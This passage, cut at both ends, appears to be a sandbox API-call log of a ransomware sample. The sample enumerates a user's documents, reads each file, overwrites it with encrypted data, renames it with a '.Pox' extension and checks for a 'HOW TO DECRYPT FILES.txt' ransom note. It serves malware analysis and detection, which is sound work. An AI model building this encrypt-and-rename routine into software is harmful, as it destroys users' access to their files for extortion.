ftLastWriteTime.dwHighDateTime=0x1d4cb86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="b2naIXbZa6", cAlternateFileName="B2NAIX~1")) returned 1 [0039.498] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0c2dea0, ftCreationTime.dwHighDateTime=0x1d4d2e8, ftLastAccessTime.dwLowDateTime=0x6d7d7a20, ftLastAccessTime.dwHighDateTime=0x1d4d083, ftLastWriteTime.dwLowDateTime=0x6d7d7a20, ftLastWriteTime.dwHighDateTime=0x1d4d083, nFileSizeHigh=0x0, nFileSizeLow=0x841f, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiXAMo2Ojlsrm0hM.pdf", cAlternateFileName="CIXAMO~1.PDF")) returned 1 [0039.498] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57467680, ftCreationTime.dwHighDateTime=0x1d4d1d2, ftLastAccessTime.dwLowDateTime=0x9703c660, ftLastAccessTime.dwHighDateTime=0x1d4c674, ftLastWriteTime.dwLowDateTime=0x9703c660, ftLastWriteTime.dwHighDateTime=0x1d4c674, nFileSizeHigh=0x0, nFileSizeLow=0x168d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="DiUwgPxxPJM-B6t5U9Y.xlsx", cAlternateFileName="DIUWGP~1.XLS")) returned 1 [0039.499] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e27a8f0, ftCreationTime.dwHighDateTime=0x1d4ce29, ftLastAccessTime.dwLowDateTime=0xb3de7890, ftLastAccessTime.dwHighDateTime=0x1d4c564, ftLastWriteTime.dwLowDateTime=0xb3de7890, ftLastWriteTime.dwHighDateTime=0x1d4c564, nFileSizeHigh=0x0, nFileSizeLow=0x6131, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlY6cRuyqsRGmwwsdu.ppt", cAlternateFileName="FLY6CR~1.PPT")) returned 1 [0039.499] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f5b2c70, ftCreationTime.dwHighDateTime=0x1d4d519, ftLastAccessTime.dwLowDateTime=0xaf1aa3e0, ftLastAccessTime.dwHighDateTime=0x1d4cdf4, ftLastWriteTime.dwLowDateTime=0xaf1aa3e0, ftLastWriteTime.dwHighDateTime=0x1d4cdf4, nFileSizeHigh=0x0, nFileSizeLow=0xaf45, dwReserved0=0x0, dwReserved1=0x0, cFileName="GXOv.docx", cAlternateFileName="GXOV~1.DOC")) returned 1 [0039.499] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebd46a90, ftCreationTime.dwHighDateTime=0x1d4d417, ftLastAccessTime.dwLowDateTime=0x5847f4d0, ftLastAccessTime.dwHighDateTime=0x1d4d4ef, ftLastWriteTime.dwLowDateTime=0x5847f4d0, ftLastWriteTime.dwHighDateTime=0x1d4d4ef, nFileSizeHigh=0x0, nFileSizeLow=0x676a, dwReserved0=0x0, dwReserved1=0x0, cFileName="smjsQosHj4xlT.odp", cAlternateFileName="SMJSQO~1.ODP")) returned 1 [0039.499] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6f949e0, ftCreationTime.dwHighDateTime=0x1d4c86e, ftLastAccessTime.dwLowDateTime=0x9aae99e0, ftLastAccessTime.dwHighDateTime=0x1d4cc9e, ftLastWriteTime.dwLowDateTime=0x9aae99e0, ftLastWriteTime.dwHighDateTime=0x1d4cc9e, nFileSizeHigh=0x0, nFileSizeLow=0x15b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="vJ YPF-i Nn4.xls", cAlternateFileName="VJYPF-~1.XLS")) returned 1 [0039.499] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc44a9210, ftCreationTime.dwHighDateTime=0x1d4d548, ftLastAccessTime.dwLowDateTime=0x1d579390, ftLastAccessTime.dwHighDateTime=0x1d4ceb8, ftLastWriteTime.dwLowDateTime=0x1d579390, ftLastWriteTime.dwHighDateTime=0x1d4ceb8, nFileSizeHigh=0x0, nFileSizeLow=0x174f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="yfFKDC845C6.pptx", cAlternateFileName="YFFKDC~1.PPT")) returned 1 [0039.499] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc44a9210, ftCreationTime.dwHighDateTime=0x1d4d548, ftLastAccessTime.dwLowDateTime=0x1d579390, ftLastAccessTime.dwHighDateTime=0x1d4ceb8, ftLastWriteTime.dwLowDateTime=0x1d579390, ftLastWriteTime.dwHighDateTime=0x1d4ceb8, nFileSizeHigh=0x0, nFileSizeLow=0x174f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="yfFKDC845C6.pptx", cAlternateFileName="YFFKDC~1.PPT")) returned 0 [0039.500] FindClose (in: hFindFile=0x406188 | out: hFindFile=0x406188) returned 1 [0039.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0039.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0039.500] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\0pkDP.docx", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\0pkDP.docx", lpFilePart=0x0) returned 0x47 [0039.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0039.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\0pkDP.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\0pkdp.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.500] GetFileType (hFile=0x26c) returned 0x1 [0039.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0039.500] GetFileType (hFile=0x26c) returned 0x1 [0039.500] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x13f06 [0039.500] ReadFile (in: hFile=0x26c, lpBuffer=0x24f62ec, nNumberOfBytesToRead=0x13f06, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x24f62ec*, lpNumberOfBytesRead=0x3ae4fc*=0x13f06, lpOverlapped=0x0) returned 1 [0039.501] CloseHandle (hObject=0x26c) returned 1 [0039.517] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0039.517] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0039.517] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\0pkDP.docx", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\0pkDP.docx", lpFilePart=0x0) returned 0x47 [0039.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0039.518] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\0pkDP.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\0pkdp.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.520] GetFileType (hFile=0x26c) returned 0x1 [0039.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0039.520] GetFileType (hFile=0x26c) returned 0x1 [0039.520] WriteFile (in: hFile=0x26c, lpBuffer=0x257ee1c*, nNumberOfBytesToWrite=0x13f10, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x257ee1c*, lpNumberOfBytesWritten=0x3ae4f0*=0x13f10, lpOverlapped=0x0) returned 1 [0039.522] CloseHandle (hObject=0x26c) returned 1 [0039.523] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\0pkDP.docx", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\0pkDP.docx", lpFilePart=0x0) returned 0x47 [0039.523] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\0pkDP.docx.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\0pkDP.docx.Pox", lpFilePart=0x0) returned 0x4b [0039.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0039.523] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\0pkDP.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\0pkdp.docx"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4b4e250, ftCreationTime.dwHighDateTime=0x1d4c629, ftLastAccessTime.dwLowDateTime=0x11b03260, ftLastAccessTime.dwHighDateTime=0x1d4cbeb, ftLastWriteTime.dwLowDateTime=0x29be2c20, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x13f10)) returned 1 [0039.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0039.523] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\0pkDP.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\0pkdp.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\0pkDP.docx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\0pkdp.docx.pox")) returned 1 [0039.524] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\1icBSdqhb.csv", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\1icBSdqhb.csv", lpFilePart=0x0) returned 0x4a [0039.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0039.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\1icBSdqhb.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\1icbsdqhb.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.524] GetFileType (hFile=0x26c) returned 0x1 [0039.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0039.524] GetFileType (hFile=0x26c) returned 0x1 [0039.524] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x1771 [0039.524] ReadFile (in: hFile=0x26c, lpBuffer=0x2593314, nNumberOfBytesToRead=0x1771, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x2593314*, lpNumberOfBytesRead=0x3ae4fc*=0x1771, lpOverlapped=0x0) returned 1 [0039.525] CloseHandle (hObject=0x26c) returned 1 [0039.540] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0039.540] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0039.540] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\1icBSdqhb.csv", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\1icBSdqhb.csv", lpFilePart=0x0) returned 0x4a [0039.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0039.540] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\1icBSdqhb.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\1icbsdqhb.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.541] GetFileType (hFile=0x26c) returned 0x1 [0039.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0039.541] GetFileType (hFile=0x26c) returned 0x1 [0039.541] WriteFile (in: hFile=0x26c, lpBuffer=0x25e7680*, nNumberOfBytesToWrite=0x1780, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x25e7680*, lpNumberOfBytesWritten=0x3ae4f0*=0x1780, lpOverlapped=0x0) returned 1 [0039.543] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\1icBSdqhb.csv", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\1icBSdqhb.csv", lpFilePart=0x0) returned 0x4a [0039.543] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\1icBSdqhb.csv.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\1icBSdqhb.csv.Pox", lpFilePart=0x0) returned 0x4e [0039.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0039.543] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\1icBSdqhb.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\1icbsdqhb.csv"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40db72a0, ftCreationTime.dwHighDateTime=0x1d4cab2, ftLastAccessTime.dwLowDateTime=0xec7290a0, ftLastAccessTime.dwHighDateTime=0x1d4d46a, ftLastWriteTime.dwLowDateTime=0x29c08d80, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x1780)) returned 1 [0039.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0039.543] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\1icBSdqhb.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\1icbsdqhb.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\1icBSdqhb.csv.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\1icbsdqhb.csv.pox")) returned 1 [0039.544] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\CiXAMo2Ojlsrm0hM.pdf", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\CiXAMo2Ojlsrm0hM.pdf", lpFilePart=0x0) returned 0x51 [0039.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0039.544] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\CiXAMo2Ojlsrm0hM.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\cixamo2ojlsrm0hm.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.544] GetFileType (hFile=0x26c) returned 0x1 [0039.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0039.544] GetFileType (hFile=0x26c) returned 0x1 [0039.544] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x841f [0039.545] ReadFile (in: hFile=0x26c, lpBuffer=0x25e9440, nNumberOfBytesToRead=0x841f, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x25e9440*, lpNumberOfBytesRead=0x3ae4fc*=0x841f, lpOverlapped=0x0) returned 1 [0039.564] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0039.564] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0039.564] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\CiXAMo2Ojlsrm0hM.pdf", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\CiXAMo2Ojlsrm0hM.pdf", lpFilePart=0x0) returned 0x51 [0039.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0039.564] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\CiXAMo2Ojlsrm0hM.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\cixamo2ojlsrm0hm.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.567] GetFileType (hFile=0x26c) returned 0x1 [0039.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0039.567] GetFileType (hFile=0x26c) returned 0x1 [0039.567] WriteFile (in: hFile=0x26c, lpBuffer=0x265f6cc*, nNumberOfBytesToWrite=0x8420, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x265f6cc*, lpNumberOfBytesWritten=0x3ae4f0*=0x8420, lpOverlapped=0x0) returned 1 [0039.568] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\CiXAMo2Ojlsrm0hM.pdf", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\CiXAMo2Ojlsrm0hM.pdf", lpFilePart=0x0) returned 0x51 [0039.568] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\CiXAMo2Ojlsrm0hM.pdf.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\CiXAMo2Ojlsrm0hM.pdf.Pox", lpFilePart=0x0) returned 0x55 [0039.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0039.568] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\CiXAMo2Ojlsrm0hM.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\cixamo2ojlsrm0hm.pdf"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0c2dea0, ftCreationTime.dwHighDateTime=0x1d4d2e8, ftLastAccessTime.dwLowDateTime=0x6d7d7a20, ftLastAccessTime.dwHighDateTime=0x1d4d083, ftLastWriteTime.dwLowDateTime=0x29c55040, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x8420)) returned 1 [0039.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0039.568] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\CiXAMo2Ojlsrm0hM.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\cixamo2ojlsrm0hm.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\CiXAMo2Ojlsrm0hM.pdf.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\cixamo2ojlsrm0hm.pdf.pox")) returned 1 [0039.569] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\DiUwgPxxPJM-B6t5U9Y.xlsx", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\DiUwgPxxPJM-B6t5U9Y.xlsx", lpFilePart=0x0) returned 0x55 [0039.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0039.569] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\DiUwgPxxPJM-B6t5U9Y.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\diuwgpxxpjm-b6t5u9y.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.569] GetFileType (hFile=0x26c) returned 0x1 [0039.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0039.569] GetFileType (hFile=0x26c) returned 0x1 [0039.569] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x168d6 [0039.569] ReadFile (in: hFile=0x26c, lpBuffer=0x345c790, nNumberOfBytesToRead=0x168d6, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x345c790*, lpNumberOfBytesRead=0x3ae4fc*=0x168d6, lpOverlapped=0x0) returned 1 [0039.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.622] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0039.622] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT 